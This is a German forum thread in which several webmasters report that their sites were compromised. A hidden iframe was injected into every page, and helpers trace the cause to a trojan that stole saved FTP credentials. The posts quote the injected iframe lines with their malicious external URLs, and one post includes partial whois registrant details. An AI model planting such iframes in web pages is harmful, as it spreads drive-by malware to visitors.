Hack mehrerer Webauftritte heute Nacht

[pepsix]

so, ich hoffe ich bin im richtigen unterforum.

heute nacht (punkt 2 uhr und punkte 3 uhr) wurden insg. 6 meiner 7 internetauftritte gehacked. es handelt sich um 5 webpackete (bei 2 verschiedenen hostern) und einen eigenen server (bei einem 3. hoster).
ich habe unterschiedliche sachen auf den seiten laufen (wbb 3.1.5, wbb 3.1.6, wordpress und eine einfache html weiterleitung). bei sämtlichen .html und .php dateien wurde ein iframe an den anfang gesetzt, zum einen:

<iframe src=http://nfarri.altervista.org/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>

bzw bei anderen:

<iframe src=http://www.rufin-zanaga.org/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>

scheinbar mit dem versuch passwort hashes abzugreifen.
ich bin jetzt dabei sämtliche php files und html files zu "säubern" bzw neu zu installieren. wobei allerdings der sinn nicht der größte ist, wenn ich keine ahnung habe wodrüber der angreifer eingestiegen ist. die verzeichnisse hatten teils (bzw teils der ganze account) httpaccess drauf, die seiten sind nirgendwo offiziell gelistet etc pp. ein gezielter angriff fällt in meinen augen raus.
jemand hier mit der gleichen erfahrung, bzw mit einem tipp was das sicherheitsloch gewesen sein könnte?

[l0wr4te]

Moin,

uns hat es auch erwischt.
Bis jetzt wissen wir von einer Joomla 1.7.3 Installation.

configuaration.php und alles überschrieben.

Ich kann mir auch noch nicht erklären, wie das möglich ist.
Grundsätzlich fällt es aber gar nicht so stark auf, mir ist es nur aufgefallen, dass ein Login im Backend nicht mehr möglich war. Und aufgrund des html tags,. die container falsch angezeigt werden.

bei mir wird auf folgende Seite mit iframe gelinkt:
http://www.rufin-zanaga.org/

<iframe src=http://www.rufin-zanaga.org/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>

und:

<html>
<iframe src=http://gevvu.is-uberleet.com/a/3537bce34540231e91e79b231405fb90 WIDTH=100 HEIGHT=100 frameborder=0></IFRAME>
</html>

Seite ist irgendwo aus dem Kongo,. aber in Italien registriert.
Whois-Abfrage:

http://whois.domaintools.com/rufin-zanaga.org

Registrant Name: DAVID T[...]
Registrant Organization: DAVID T[...]
Registrant Street1:Via Guicciardini, 2
Registrant Street2:
Registrant Street3:
Registrant City:VICENZA
Registrant State/Province:VI
Registrant Postal Code:36100
Registrant Country:IT
Registrant Phone:+39.3400596772
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:

[mathmos]

Bisher alles Systeme, die auch mit Erweiterungen arbeiten. Seit Ihr sicher, dass ihr keine Erweiterungen benutzt die unsicher sind?

Whois-Daten sich hier übrigens wie alle anderen Realdaten nicht gerne gesehen.

[pepsix]

also da es verschiedenste versionen sind (zumindest beim wbb) und auch eine reine weiterleitungsseite (ein 1 mb account der lediglich ein html file mit einer weiterleitung per frameset enthält) betroffen ist denke ich nicht, dass das der fall ist. eher ein grds problem in php. (mysql und ähnlicher kram ist bei der weiterleitung auch nicht vorhanden)

[Kugelfisch23]

Eine Schwachstelle in PHP oder einer anderen serverseitig gennutzen Software wäre zwar prinzipiell denkbar, scheint mir aber eher unwahrscheinlich, da die Anzahl der kompromittierten Websites dann sehr viel höher sein müsste.

Bist du dir sicher, dass deine FTP-Zugangsdaten nicht in falsche Hände gelangt sind, z.B. da du sie auf mehreren Websites unverändert benutzt hast, sie trivial sind oder dein System kompromittiert ist? Insbesondere Letzteres solltest du nach Möglichkeit zeitnah untersuchen, da dann u.U. auch andere Daten abhanden gekommen sind - siehe dazu http://board.gulli.com/thread/15222...2#post12551252.

[pepsix]

nein also ich hab weder die gleichen ftp daten bei den accounts noch denke ich, dass die in falsche hände gelangt sein könnten. ich nutze grds. sftp und manage die seiten über 2 verschiedene programme (flashfxp und filezilla) wobei kein account bei beiden programmen auftaucht.

mit dem leitfaden ist ja schön und gut - nur: solange ich nicht weiß wie derjenige rein gekommen ist machts vermutlich auch wenig sinn alles neu zu installieren :-( wenn morgen die lücke wieder offen steht ... und wie gesagt: es geht hier um 3 verschiende hsoter mit 4 verschiedenen systemkonfigurationen, es ist mir ein rätsel wo die lücke sein könnte ...

[Kugelfisch23]

mit dem leitfaden ist ja schön und gut - nur: solange ich nicht weiß wie derjenige rein gekommen ist machts vermutlich auch wenig sinn alles neu zu installieren

Das ist klar, allerdings finden sich im Leitfaden im verlinkten Beitrag auch einige Tipps, wie eine mögliche Kompromittierung des lokalen Systems nachgewiesen werden kann. Dies solltest du meines Erachtens erst untersuchen, zumal das meines Erachtens die wahrscheinlichste Ursache dafür ist, dass alle deine Sites (deren Zugangsdaten - wenn auch in verschiedenen Programmen - auf deinem System gespeichert waren?) kompromittiert wurden. Bedenke, dass eine auf deinem System aktive Malware grundsätzliche alle (nicht oder mit einem bekannten Schlüssel verschlüsselt) gespeicherten Zugangsdaten auslesen und sämtliche Benutzereingaben mitschneiden kann.

[pepsix]

naja das ist ja nicht ganz richtig: alle bis auf eine seite wurden verändert. das hatte mich bisher glauben lassen, dass es wohl ein angriff von aussen ist. nichts desto trotz werde ich sicherheitshalber mal mein lokales system neu installieren, das hatte ich sowieso die nächste zeit vor und einer eventuellen infizierung meines rechners so hoffentlich entgegenwirken

[Kugelfisch23]

Du musst nicht sofort das System neu aufsetzen, es reicht auch, zunächst einmal nach konkreten Anhaltspunkten für die mutmassliche Kompromittierung zu suchen. Dazu eignet sich insbesondere ein von einem unabhängigen Bootmedum ausgeführter Malwarescanner, wie im verlinkten Beitrag des Leitfadens erwähnt. Findest du konkrete Hinweise auf eine Kompromittierung, ist das Neuaufsetzen natürlich der richtige Weg, ausserdem solltest du dann unbedingt umgehend sämtliche Zugangsdaten von einem sauberen System aus ändern.

[fronzel]

Ist mir auch gestern passiert - gleiche URL, auf allen meinen Seiten. Von daher kann ich auch mit Gewissheit sagen woher es kommt. Zumindest bei mir, denke aber bei anderen ist es ähnlich.

Ich hatte mir letzte Woche einen Trojaner durch ein drive-by exploit eingefangen. Bei mir wars Internet Explorer 8, kann nicht genau sagen was das Exploit jetzt war, aber wohl IE oder ein plugin oder so, zumindest würde das naheliegen. AUfgefallen an den sehr kurz hochgepoppten Fenstern die sofort wieder verschwanden. Die unbekannte exe die das exploit aufgerufen hat hab ich dann schnell im Process manager gekillt und im windows Verzeichnis gelöscht. Offenbar hat das Teil aber trotz der kurzen Lebenszeit meine schönen im FIlezilla gecachten logins auslesen und wer-weiss-wohin übermitteln. VOn daher wurden auch schön alle meine Sites mit dem iframe ausgestattet, habs aber erst heute gemerkt.


Kann nur jedem raten wenn nicht 100% sicher das System neu aufsetzen, der Trojaner wurde bei mir von Kaspersky NICHT erkannt. Außerdem alle ftp account passwörter und passwörter zu hosting und allen email addressen (Und was einem noch so wichtig ist. paypal? Ebay?) ändern. Seit vorsichtig, wer auch immer das verübt hat ist ein profi mit kommerziellem Hintergedanken, also weiss Gott was man als nächstes zu befürchten hat. Bei mir wars bisher zum Glück nur ftp, also alles aus filezilla. Würde aber wetten wer dahinter steht hat sich noch mehr caches schicken lassen (Firefox, IE).

[Kugelfisch23]

Insofern war meine Vermutung scheinbar korrekt. Dem Rat, bei konkreten Anhaltspunkten für eine Kompromittierung das System neu aufzusetzen und zeitnah sämtliche Zugangsdaten von einem sauberen System aus zu ändern, kann ich mich nur anschliessen. Das wird auch im verlinkten Leitfaden empfohlen. Übrigens stecken hinter beinahe jeder in freier Wildbahn verbreiteten Malware kommerzielle Hintergedanken - deshalb sind auch rein zerstörerische Viren oder Würmer beinahe ausgestorben, heute dominieren Würmer oder trojanische Pferde, welche das kompromittierte System ausspähen und/oder in ein Botnetz eingliedern.

Um solche Vorfälle zukünftig zu vermeiden, wäre die Lektüre des kompletten Sicheheitsleitfadens (http://board.gulli.com/thread/15222...-und-erkennen/) empfehlenswert. Punkt 2 nennt diverse Tipps, um das eigene System abzusichern. Dazu zählt insbesondere, einen aktuell gehaltenen, modernen Browser (d.h. nicht den Internet Explorer, zudem noch in Version 8) einzusetzen, die Menge aktiver Plugins minimal zu halten und sicherheitsrelevante Updates für das System, den Browser, verbliebene Plugins sowie andere Anwendungen mit Kontakt zu Daten aus dem Internet umgehend zu installieren.

[godlike]

Mir ist es auch passiert! Neueste Wordpress Version. Zum Surfen benutze ich nur den aktuellsten Firefox ohne Plugins da ich mein System erst neulich neu aufgesetzt habe.

Code:

<iframe src=http://www.rufin-zanaga.org/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>

Habe sofort alle Dateien online ersetzt und Passwörter geändert. Was mich echt aufregt ist das ich das ja erst kürzlich hatte. Wie kann das denn schon wieder sein? Ich habe seither eigentlich nichts großartiges an meinem Laptop gemacht mit dem ich auf die Webseite zugreife. Über Weihnachten gar nicht und dieses Wochenende war ich geschäftlich weg. Bin erst vor 2 Stunden heim gekommen, möchte einen Artikel schreiben und wunder mich über die Fehlermeldung beim Absenden (cannot modify header information). Ist mir spanisch vorgekommen und ich schau in den Dateien, finde das Iframe von oben. Dateien wurden laut Datum um 21:07 verändert. Da hab ich gekocht. Davor war dee Laptop nur an, kurz auf Facebook mehr nicht. Kein Login auf einen FTP o.Ä. in den letzten Tagen...

Wie kann denn das sein? Ich werde auf jeden Fall noch mals mein komplettes System Scannen und notfalls neu aufsetzen (schon wieder) + alle Logindaten ändern. Mir ist es einfach schleierhaft wie das passieren konnte....

edit: Mir ist aufgefallen das paralell zu der "cannot modify header information"-Meldung mein Adobe Professional auf ging und ebenfalls abschmierte. Das passierte dann immer beim versuch aufs Backend des Wordpress zuzugreifen. Ist aber auch immer hängen geblieben (also Adobe Prof.). Hab es dann sogleich runter geschmissen. Vielleicht hat das Teil ja eine Sicherheitslücke. Hat einer von euch ähnliches beobachtet?

Gruß godlike

[dasvitamin]

Huhu,
Bei unserem Blog (WP 3.2.1.) das gleiche, die Datein wurden ca. um 3:08 geändert und mit dem iframe versehen, zudem ist bei zwei Kollegen beim versuch das Admin panel aufzurufen ebenfalls ein Adobe plugin abgeschmiert, ich glaub es war das Acrobat Pro. bin mir aber nicht mehr ganz sicher.

Habe nun erstmal alle iframes entfernt und der login geht wieder...

Kann sowas denn durch eine Schwachstelle im plugin passieren, dass Dateien des Blog systems geändert werden? Oder hat das iframe eher versucht über das plugin die Rechner auszu spionieren?

[aNtiCHrist]

Die Beobachtung mit dem Adobe Acrobat(?) dürfte wohl eher ein Angriff auf den Rechner gewesen sein, der mutmaßlich sogar erfolgreich war. XSS/CSRF über das Plugin will ich zwar nicht ausschließen, das erscheint mir aber doch deutlich weniger wahrscheinlich, da dem Angreifer dann ja bekannt sein müsste, dass du die Site administrieren kannst. Wie Kugelfisch23 unter http://board.gulli.com/thread/168461...0#post14299220 bereits gewarnt hatte, sind Plugins oftmals Einfallstore für Malware und die erwähnte Schwachstelle im Adobe Reader ist natürlich auch im Adobe Acrobat vorhanden.

Dass ihr offenbar solch eine anfällige Version als Plugin ohne Rückfrage in euren Browsern starten lasst, stellt natürlich eine Schwachstelle dar, die auch zuvor bereits ausgenutzt worden sein könnte. Insofern ließe sich das Ausspähen der Zugangsdaten problemlos erklären. Dass serverseitige Exploits zum Einsatz kamen, erscheint mir auch unwahrscheinlich, da es offenbar keine Gemeinsamkeiten bei den Webanwendungen gibt und ja offenbar auch FTP-Zugangsdaten ausgespäht wurden, die möglicherweise nicht mal auf dem Server vorlagen. Ausgenutzte Schwachstellen in Webserver, PHP, ... schließe ich wie Kugelfisch23 aus, denn das würde tatsächlich schnell große Kreise ziehen. Diesbezüglich ist mir aber nichts bekannt.

[godlike]

Hey aNtiCHrist, um mal von mir zu sprechen: Zumindest ich rede von keinem Plugin sondern vom ganu "normalen" Adobe Acrobat Professional das gestartet wurde. Also als Programm. Oder wie hast du das gemeint?

Nachtrag: HiJack-This brachte kein Ergebnis, der Scan mit dem Bootbaren-Avira Antivir brachte 2 Treffer. Diese beiden sind aber Cracks bzw. Keygen von Software. Imho falsch erkannt...

edit: noch mal zum Plugin-Ding und Adobe. Meinst du das ein Plugin den Zugriff auf das Adobe-Professional zulies? Bzw das Starten dieses Programms. Wie bzw. durch was kann ich sowas verhindern. Außer Flash und Adblock war kein Plugin in Firefox aktiviert...

[aNtiCHrist]

Hey aNtiCHrist, um mal von mir zu sprechen: Zumindest ich rede von keinem Plugin sondern vom ganu "normalen" Adobe Acrobat Professional das gestartet wurde. Also als Programm. Oder wie hast du das gemeint?

Und du bist sicher, dass in deinem Browser kein entsprechendes Plugin verfügbar ist (oder aber PDF-Dateien automatisch in einem externen Programm geöffnet werden)? Denn offenbar wurde der Start ja durch den Besuch einer Webseite ausgelöst. Sofern nicht gerade eine Schwachstelle in Firefox vorliegen sollte, scheinen mir das die einzig plausiblen Erklärungsmöglichkeiten zu sein.

Wie bzw. durch was kann ich sowas verhindern. Außer Flash und Adblock war kein Plugin in Firefox aktiviert...

Du verwechselst weiterhin Plugins und Erweiterungen. Wenn aber außer Flash (die angreifbare 11er-Version? Ausführung ohne Rückfrage?) kein Plugin aktiv war, dann wird es möglicherweise ein Flash-Exploit gewesen sein. Oder du hast Firefox so konfiguriert, dass PDF-Dateien automatisch geöffnet werden. Das ist dann auch nicht besser, als ein entsprechendes Plugin im Browser zu haben.

[godlike]

Ok, jetzt wirds strange. Gerade auf der Arbeit angekommen und bemerkt das hier das selbe ist. Also auf einer anderen Webseite, anderes System. Dateien ersetzt und alle Passwörter geändert. Habe sicherheitshalber mal Filezilla deinstalliert. An dem Rechner hier ist das eigentlich das einzige Programm welches FTP-Passwörter speichert. In Firefox gehe ich ja nicht auf FTPs...

Komischerweise wurden die Daten auch gestern Abend um kurz nach 21:00 Uhr geändert. Da war ich definitiv nicht um Geschäft und auf meinem Rechner daheim, wo ja das selbe Problem war/ist, habe ich auch definitiv keine Passwörter zu einer Webseite vom Geschäft hinterlegt. Auch logge ich mich da niemals ein. Hier auf dem Firmenrechner habe ich aber jedoch einen Login zu meiner Privaten Seite wo das Problem auftaucht. Könnte dann also von hier stammen der Angriff? Habe hier bei dem letzten Problem auch alles neu aufgesetzt, gescannt, geupdated usw. Bin wirklich ratlos was hier ab geht.

Wie wäre die Vorgehensweise den Rechner maximal abzusichern? Virenscanner läuft, Windows und Programme sind auf dem neusten Stand. Irgendwelche dubiosen Seiten surfe ich auch nicht an - erst rechnt nicht hier auf der Arbeit. Anwendungen werden nur mit Bedacht installiert...

edit: Habe nun alle Erweiterungen in Firefox deaktiviert. In der Tat war hier u.A. auch ein PDF-Plugin aktiviert. Wie wäre die weitere vorgehensweise. Die Erweiterungen deaktiviert lassen oder versuchen diese ganz zu löschen? Was ist mit Flash 11? Nur bei bestimmten Seiten per Noscript erlauben und wieder aktivieren? Irgendwo muss ja jetzt eine Schwachstelle offen sein. Oder ist das mit dem deaktivieren der Erweiterungen getan? Ich fürchte nicht... Wie man über FF an die FTP-Passwörter gelangen kann ist mit weiterhin schleierhaft da ich diese da nicht hinterlegt habe. Auch war der Geschäftsrechner am Wochenende nicht an. Wohl aber mein Laptop daheim - hier gibt es aber wiederum keinen Zusammenhang zu den FTP-Zugangsdaten der Geschäftsseite.

@alle anderen

Welche FTP-Programme / Plugins / Erweiterungen sind bei euch gelaufen? Vielleicht lassen sich hier ja gemeinsamkeiten Erkennen die den Infizierungsweg erkennen lassen.

Hier lief
- Filezilla
- Firefox 9.0.1 (Adobe Acrobat 8.0.0.456, Java Deployment Toolkit 6.0.220.4, Java Platform SE 6 U22 6.0.220.4, Quick Time 7.7.1 7.7.1.0, Flash 11.0.1.152)...

[DrDuke]

Üble Sache, ich habe natürlich auch alle PWs schön im FZ gespeichert, habe mich auch schon gefragt weshalb man dort kein Master PW setzen kann...

Heute Abend gleich mal meine Websites kontrollieren, dass wäre eine Menge arbeit sollte mich das Teil auch erwischt haben

Kennt jemand eine gute alternative zu FZ? So werde ich das sicher nicht mehr nutzen (auch wenn ich mich so schön daran gewöhnt habe)

[Kugelfisch23]

Komischerweise wurden die Daten auch gestern Abend um kurz nach 21:00 Uhr geändert. Da war ich definitiv nicht um Geschäft und auf meinem Rechner daheim, wo ja das selbe Problem war/ist, habe ich auch definitiv keine Passwörter zu einer Webseite vom Geschäft hinterlegt. Auch logge ich mich da niemals ein. Hier auf dem Firmenrechner habe ich aber jedoch einen Login zu meiner Privaten Seite wo das Problem auftaucht. Könnte dann also von hier stammen der Angriff?

Ja, das scheint - da auf dem Firmenrechner offenbar die Zugangsdaten für beide angegriffenen Sites gespeichert waren - nicht unwahrscheinlich. Wenn das System kompromittiert wurde, könnten die Zugangsdaten für beide Website in falsche Hände gelangt sein. Der Rechner muss zum Zeitpunkt, als diese schliesslich missbraucht wurden, nicht eingeschaltet sein - schliesslich wird der Angreifer kaum den FTP-Client auf dem kompromittierten System nutzen (das wäre einerseits zu auffällig und andererseits nicht sinnvoll automatisierbar), sondern die zuvor gestohlenen Zugangsdaten mehrere Websites dazu nutzen, diese automatisiert zu ändern und mutmasslich Exploit-Code zur weiteren Verbreitung seiner Malware einzubauen.

Wie wäre die Vorgehensweise den Rechner maximal abzusichern? Virenscanner läuft, Windows und Programme sind auf dem neusten Stand.

Bist du dir sicher, dass dies auch für alle Browser-Plugins gilt? Offenbar waren ja (ohne dein Wissen?) diverse Plugins aktiv. Abgesehen davon ist mindestens im aktuellen Flash-Player-Plugin der 11er-Versionsreihe eine Schwachstelle vorhanden, die Adobe seit inzwischen über einem Monat nicht behoben hat (mutmasslich weil dazu bloss wenige Details publik sind). Halte die Menge der Plugins (nicht zu verwechseln mit Firefox-Erweiterungen) minimal, beachte dabei, dass diverse Anwendungen leider ungefragt Plugins installieren, welche du im Anschluss wieder deaktivieren oder deinstallieren musst. Mehr als Flash wirst du kaum benötigen, und selbst das aktuelle Flash-Player-Plugin in Version 11 würde ich aktuell deaktivieren, bis die Schwachstelle behoben ist. Weitere Tipps findest du unter http://board.gulli.com/thread/15222...-und-erkennen/. Eventuell wäre ein Vulnerability-Scanner wie der Secunia PSI sinnvoll, um Schwachstellen und sicherheitsrelevante Updates der Hersteller zeitnah zu bemerken und einspielen zu können.

Wie man über FF an die FTP-Passwörter gelangen kann ist mit weiterhin schleierhaft da ich diese da nicht hinterlegt habe. Auch war der Geschäftsrechner am Wochenende nicht an.

Eine Schwachstelle in Firefox oder einem Plugin kann die Ausführung von beliebigem Code auf dem lokalen System mit den Rechten des Benutzers, der Firefox bzw. den plugin-container.exe-Prozess ausführt, erlauben. Diese Tatsache nutzt diverse Malware für Drive-By-Infektionen - mutmasslich dürfte dies auch der Grund sein, weshalb gezielt weitere Websites verändert werden: dabei wird Exploit-Code eingebaut (genauer: Code, der zum Nachladen von Exploit-Code führt), um die Weiterverbreitung der Malware zu garantieren. Ist einmal Schadcode auf dem lokalen System zur Ausführung gekommen, kann dieser auch alle auf dem System gespeicherten Zugangsdaten auslesen und zukünftige Eingaben mitschneiden. Ob dies im Einzelfall geschieht, lässt sich ohne manuelle Analyse der Malware kaum feststellen.

[sh2606]

Ich hatte das vor einiger Zeit auch mal, dass mehrere ganz normale HTML-Seiten (kein CMS o.Ä., von Hand geschrieben) auf einem meiner Webspaces mit dem ersteren der genannten iframes verändert wurde. Eine Infektion meines Systems konnte ich damals relativ sicher ausschließen, da unter anderem auch keine der anderen Webspaces (auch welche beim gleichen Anbieter wie der Infizierte) von mir infiziert wurden trotz Passwortspeicherung und Benutzung in Filezilla usw.
Allerdings hatte ich das Passwort auf mehreren Seiten in Verwendung, weshalb es wohl dort irgendwo eine Lücke gab und es so an die entsprechenden Personen kam. Oder dieses spezielle Passwort wurde über eine Wortliste erraten, es war ein ziemlich schwaches Passwort (lang, aber aus Wörtern zusammengesetzt, die zwar zusammen keinen Sinn ergaben, aber trotzdem), dass ich nur für unwichtiges in Verwendung hatte.

Komischerweise war es vor fast genau einem Jahr, jetzt wo ich so drüber nachdenke...